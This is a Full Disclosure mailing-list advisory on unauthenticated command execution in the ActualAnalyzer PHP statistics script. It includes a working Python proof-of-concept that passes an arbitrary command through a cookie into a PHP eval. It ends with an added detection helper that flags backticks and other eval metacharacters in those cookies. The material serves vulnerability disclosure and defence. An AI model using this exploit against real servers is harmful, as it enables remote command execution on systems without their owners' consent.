
List:       full-disclosure
Subject:    [FD] Actual Analyzer Unauthenticated Command Execution
From:       "Benjamin Harris" <bch () hush ! ai>
Date:       2014-08-27 23:21:26
Message-ID: 20140827232126.D280BC00FD () smtp ! hushmail ! com

Hi All

URL: http://www.actualscripts.com/products/analyzer/

I tried to report this a month ago, but got no response from the  
developers via the support form on their website, requesting a GPG 
key. This is an old vulnerability I found while dusting off some 
old hard drives. 

The latest version is still vulnerable.

Brief:
-------------------------

The most popular web statistics tool delivers one big flat list 
with statistics for any website. It is very easy to use, but only for 
websites with a small number of pages. Besides, only the primary 
options for analysing website statistics are provided.


Details:
--------------------------

We control a limited number of characters of an eval. Load the command 
into an unused variable and use backticks to execute the command in 
the short space available. Attached is a POC.

The prerequisite is that you must know the domain of a website being 
tracked by this script.

Many thanks,
Ben
["release.py" (text/x-python)]

###############################
# ActualAnalyzer  exploit.
# Tested on Lite version 
# We load command into a dummy variable as we only have 6 characters to own the eval 
# but load more as first 2 characters get rm'd.
# We then execute the eval with backticks.
# 11/05/2011
##############################

import urllib
import urllib2
import sys
import time



def banner():
	print "	    ____                        __              __                  __                     "
	print "	   / __/_  ______ _ ____ ______/ /___  ______ _/ /___ _____  ____ _/ /_  ______  ___  _____"
	print "	  / /_/ / / / __ `// __ `/ ___/ __/ / / / __ `/ / __ `/ __ \/ __ `/ / / / /_  / / _ \/ ___/"
	print "	 / __/ /_/ / /_/ // /_/ / /__/ /_/ /_/ / /_/ / / /_/ / / / / /_/ / / /_/ / / /_/  __/ /    "
	print "	/_/  \__,_/\__, (_)__,_/\___/\__/\__,_/\__,_/_/\__,_/_/ /_/\__,_/_/\__, / /___/\___/_/     "
	print "	             /_/                                                  /____/                   "


def usage():
	print "	[+] Usage:"
	print "	[-] python " + sys.argv[0] + " -h vulnHOST -d analyticdomain -c \"command\""
	print "	[-] python fuq.actualanalyzer.py -h test.com/lite -d analyticdomain -c \"touch /tmp/123\""

banner()
# Expects "-h vulnHOST -d analyticdomain -c command": six arguments after the script name.
if len(sys.argv) < 7:
	usage()
	quit()
domain = sys.argv[2]    # vulnerable host (value after -h), e.g. test.com/lite
host = sys.argv[4]      # domain tracked by the analyzer (value after -d), sent as ?anp=
command = sys.argv[6]   # command to run (value after -c)

def commandexploit(domain, host, command):
	url = 'http://' + domain + '/aa.php?anp=' + host
	data = None
	# The command is loaded into the unused 'ant' cookie; 'anm' carries the short
	# backtick payload that reaches the eval and executes it.
	headers = {'Cookie': "ant=" + command + "; anm=414.`$cot`"}
	exploit1 = urllib2.Request(url, data, headers)
	exploit2 = urllib2.urlopen(exploit1)

commandexploit(domain, host, command)


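The root cause described above is cookie data reaching a PHP eval, with backticks (PHP's shell-execution operator) and `$` (variable interpolation) doing the work. As an added example that is not part of the advisory or of the vendor's code, the following Python 3 helper shows what a defender can do with that knowledge: parse the `Cookie` header of requests to `aa.php` and flag any cookie value carrying those metacharacters, which a tracking cookie has no reason to contain. The request records, the cookie names `ant` and `anm` being the only ones watched, and the assumption that the front end logs or can inspect the `Cookie` header are all taken from the advisory or constructed here; the real fix is to stop passing request data through eval.

```python
"""Detection helper for eval-injection via cookies (added example, not the advisory's code)."""
import re
from urllib.parse import urlsplit

# Characters that let cookie data break out of a string evaluated by PHP eval():
# backtick runs a shell command, '$' starts variable interpolation, the rest
# allow statements and calls. A numeric/ID tracking cookie never needs them.
SUSPICIOUS = re.compile(r"[`$;(){}]")

# Cookie names the advisory shows reaching the eval. Add further names only
# after reviewing the application; this set is an assumption limited to the page.
TRACKED_COOKIES = {"ant", "anm"}


def parse_cookie_header(header):
    """Split a raw Cookie header into (name, value) pairs without decoding them."""
    pairs = []
    for part in header.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, value = part.partition("=")  # partition keeps any '=' inside the value
        pairs.append((name.strip(), value.strip()))
    return pairs


def inspect_request(path, cookie_header):
    """Return [(cookie_name, value), ...] for watched cookies carrying eval metacharacters.

    Only requests whose path is the analyzer endpoint (aa.php) are inspected, so
    ordinary pages that happen to set the same cookies are not flagged.
    """
    findings = []
    if not urlsplit(path).path.endswith("/aa.php"):
        return findings
    for name, value in parse_cookie_header(cookie_header):
        if name in TRACKED_COOKIES and SUSPICIOUS.search(value):
            findings.append((name, value))
    return findings


def scan(requests):
    """Run inspect_request over request records {'path':..., 'cookie':...}; return hits."""
    hits = []
    for rec in requests:
        for name, value in inspect_request(rec["path"], rec.get("cookie", "")):
            hits.append((rec["path"], name, value))
    return hits


# Constructed sample records (hypothetical hostnames; the payload shape follows the advisory).
SAMPLE_REQUESTS = [
    {"path": "/aa.php?anp=tracked.example", "cookie": "ant=1; anm=414"},
    {"path": "/aa.php?anp=tracked.example", "cookie": "ant=touch /tmp/123; anm=414.`$cot`"},
    {"path": "/index.php", "cookie": "anm=414.`$cot`"},
]

if __name__ == "__main__":
    for path, name, value in scan(SAMPLE_REQUESTS):
        print("ALERT %s cookie %s=%r" % (path, name, value))
```

The `anm` cookie is the reliable indicator: the command itself sits in `ant` as plain text and can look like anything, but the short payload in `anm` must contain the backtick to reach a shell, so matching on metacharacters catches the technique rather than one particular command. Until the script is fixed, the same check can drive a WAF rule that blocks or logs such requests to `aa.php`.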

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
